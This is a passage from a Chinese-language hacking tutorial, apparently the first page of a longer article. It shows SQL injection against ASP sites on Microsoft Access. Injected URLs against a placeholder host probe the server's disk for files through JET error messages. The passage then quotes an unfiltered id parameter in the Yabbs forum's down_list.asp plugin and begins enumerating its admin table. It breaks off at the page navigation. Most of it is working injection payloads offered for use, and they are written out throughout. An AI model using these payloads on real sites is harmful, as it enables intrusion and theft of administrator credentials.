照例先介绍一下，在大概一个月前幻影旅团和灰色轨迹对这个问题进行了一些讨论就是在递交：

http://www.target.com/show.asp?id=1 or 0<>(select count(*) from admin.c)

的时候会出现如下的错误提示：

Microsoft JET Database Engine 错误 '80004005'

找不到文件 'C:\WINNT\system32\admin.mdb'。

看到了吧，如果看过xhacker写的那份学习报告的人肯定就已经兴奋起来了，因为那份报告隐约提到了ACCESS的一个漏洞可以Dir C:\ /s！让我们继续玩下去吧，递交：

http://www.target.com/show.asp?id=1 or 0<>(select count(*) from c:\boot.ini)

Microsoft JET Database Engine 错误 '80004005'

找不到文件 'c:\boot.mdb'。

看样子from后面的部分我们是可以添加路径的了。既然想Dir当然就要访问了cmd.exe拉，再来：

http://www.target.com/show.asp?id=1 or 0<>(select count(*) from c:\winnt\system32\cmd.exe.c)

看看错误提示吧：

Microsoft JET Database Engine 错误 '80004005'

不可识别的数据库格式 'c:\winnt\system32\CMD.EXE'。

看样子我们的希望落空了哦(多次实践后你可以得到from后面跟的文件名的格式应该是这样文件名.后缀名.任何字母，这样你才可以访问到文件名.后缀名的那个文件）。这个时候这个漏洞好象我们至多只可以确定一个目录或一个文件是否存在，当时我和很多人的想法一样认为这属于鸡肋级的漏洞，食之无味，弃之可惜。

后来在一天在帮一个朋友检测论坛安全性，看了看是用的雅艺论坛。首先我试了一下默认的数据库名。

http://www.target.com/yabbs/data/1yabbs.asp

没有提示找不到文件，看样子是没改数据库名了。但是由于扩展名是.asp，我们仍然无法下载他的数据库。没办法，只好到硬盘去翻了半天把我原来下载的一套雅艺论坛拿出来看代码。结果还真发现了一个激动人心的地方，在论坛自带的下载插件的down_list.asp这个文件发现这样的一段代码：

if request("id")="" then

response.write "您没有选择相关软件，请返回"

response.end

end if

set rs=server.createobject("adodb.recordset")

sql="select Dclass.class,DNclass.Nclass,download.showname,download.classid,download.Nclassid,download.lasthits,download.downshow from download,Dclass,DNclass where download.classid=Dclass.classid and download.Nclassid=DNclass.Nclassid and download.ID="&request("id")

看见没有，&request("id")这个变量没做任何过滤就代如到查询语句中去了，我们可以进行SQL注入！

说的容易，在做的时候却碰到了困难，递交如下URL：

http://www.target.com/yabbs/down_list.asp?id=1%20or%200<>(select%20count(*)%20from%20admin)

成功返回页面，OK，存在admin表。再来确定保存用户名的列名：

[1] [2] [3] 下一页